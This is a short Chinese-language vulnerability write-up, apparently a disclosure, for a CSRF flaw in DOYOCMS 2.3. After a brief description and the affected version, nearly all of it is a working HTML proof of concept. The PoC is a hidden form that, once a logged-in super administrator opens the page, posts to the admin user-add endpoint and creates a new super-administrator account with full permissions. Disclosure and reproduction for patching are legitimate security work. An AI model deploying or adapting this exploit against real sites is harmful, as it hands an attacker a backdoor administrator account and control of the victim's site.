漏洞描述

DOYOCMS 2.3版本CSRF漏洞可以添加超级管理员账号
 
 

影响版本

DOYOCMS 2.3
 
 

漏洞复现

超级管理员登录后,打开如下页面
poc
one.html---添加超级管理员

  <!-- CSRF PoC  -->
  <body>

  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/doyocms-master/admin.php?c=a_adminuser&a=add&run=1" method="POST">
      <input type="hidden" name="auid" value="" />
      <input type="hidden" name="auser" value="test2" />
      <input type="hidden" name="apass" value="test2" />
      <input type="hidden" name="gid" value="1" />
      <input type="hidden" name="level" value="1" />
      <input type="hidden" name="aname" value="" />
      <input type="hidden" name="amail" value="" />
      <input type="hidden" name="atel" value="" />
      <input type="hidden" name="pclasstype&#91;&#93;" value="1" />
      <input type="hidden" name="pclasstype&#91;&#93;" value="9" />
      <input type="hidden" name="pclasstype&#91;&#93;" value="10" />
      <input type="hidden" name="pclasstype&#91;&#93;" value="2" />
      <input type="hidden" name="pclasstype&#91;&#93;" value="18" />
      <input type="hidden" name="pclasstype&#91;&#93;" value="19" />
      <input type="hidden" name="pclasstype&#91;&#93;" value="3" />
      <input type="hidden" name="pclasstype&#91;&#93;" value="4" />
      <input type="hidden" name="pclasstype&#91;&#93;" value="6" />
      <input type="hidden" name="pclasstype&#91;&#93;" value="7" />
      <input type="hidden" name="pclasstype&#91;&#93;" value="8" />
      <input type="hidden" name="pclasstype&#91;&#93;" value="11" />
      <input type="hidden" name="pclasstype&#91;&#93;" value="22" />
      <input type="hidden" name="pclasstype&#91;&#93;" value="23" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>```